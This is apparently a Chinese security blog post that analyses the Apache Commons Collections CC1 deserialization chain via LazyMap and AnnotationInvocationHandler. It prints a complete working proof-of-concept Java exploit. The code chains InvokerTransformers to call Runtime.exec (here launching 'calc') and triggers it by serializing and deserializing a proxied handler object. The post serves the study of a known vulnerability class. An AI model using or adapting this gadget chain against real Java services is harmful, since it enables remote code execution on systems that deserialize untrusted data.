前言

CC1链之LazyMap链

分析

这次在寻找的 transform 入口中，找到 LazyMap 中的get方法

public Object get(Object key) {
        // create value for key if key is not currently in the map
        if (map.containsKey(key) == false) {
            Object value = factory.transform(key);
            map.put(key, value);
            return value;
        }
        return map.get(key);
    }

factory可控，这样可以变为ChainedTransformer，剩下就是循环调用，向上寻找调用get方法处，依旧是在

AnnotationInvocationHandler.class 中的 invoke方法中

public Object invoke(Object var1, Method var2, Object[] var3) {
        String var4 = var2.getName();
        Class[] var5 = var2.getParameterTypes();
        if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
            return this.equalsImpl(var3[0]);
        } else if (var5.length != 0) {
            throw new AssertionError("Too many parameters for an annotation method");
        } else {
            /***/
            }
            
            switch(var7) {
            /***/
            default:
                Object var6 = this.memberValues.get(var4);
                if (var6 == null) {
                   /***/
                }
            }
        }
    }

这个方法就很特别，在 动态代理中当调用代理的方法时会进行触发handler中的invoke,所以可以动态代理进行进一步利用，首先看一下利用条件

var4.equals(“equals”);
var5.length != 0

即 不能调用equals方法和 必须是一个无参方法

随后还是在 AnnotationInvocationHandler 中凑巧发现了 readObject 中符合条件的函数调用，且参数 memberValues 可控

Iterator var4 = this.memberValues.entrySet().iterator();

通过代理一个Map类型，反序列化时通过 readObject 来触发 invoke，再触发 get 再触发 transform

构造poc

Transformer[] transformers = new Transformer[]{
               	new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        //chainedTransformer.transform(Runtime.class);

        Map<Object, Object> map = new HashMap<>();
        Map lazymap = LazyMap.decorate(map, chainedTransformer);  //一旦调用get方法，就实现rce

构造代理

Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor cons = c.getDeclaredConstructor(Class.class, Map.class);
cons.setAccessible(true);
InvocationHandler handler = (InvocationHandler) cons.newInstance(Retention.class, lazymap);
//更改memberValues的值  实际的处理器

Map proxymap = (Map) Proxy.newProxyInstance(lazymap.getClass().getClassLoader(),new Class[]{Map.class},handler);
//创建代理传入类加载器、接口、处理器

Object o = cons.newInstance(Retention.class,proxymap);
//最后序列化这个类

poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class CC1 {

    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        //chainedTransformer.transform(Runtime.class);

        Map<Object, Object> map = new HashMap<>();
        Map lazymap = LazyMap.decorate(map, chainedTransformer);  //一旦调用get方法，就实现rce

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor cons = c.getDeclaredConstructor(Class.class, Map.class);
        cons.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) cons.newInstance(Retention.class, lazymap);
        Map proxymap = (Map) Proxy.newProxyInstance(lazymap.getClass().getClassLoader(),new Class[]{Map.class},handler);

        Object o = cons.newInstance(Retention.class,proxymap);
        serialize(o);
        unserialize("ser.bin");
        
    }

    public static void serialize(Object obj) throws IOException {
        FileOutputStream fos = new FileOutputStream("ser.bin");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(obj);
        oos.close();
    }
    public static Object unserialize(String Filname) throws IOException, ClassNotFoundException {
        FileInputStream fis = new FileInputStream(Filname);
        ObjectInputStream ois = new ObjectInputStream(fis);
        Object obj = ois.readObject();
        return obj;
    }
}

Y0ng的博客

CommonsCollections-1(下)

前言

分析

构造poc

poc

流程图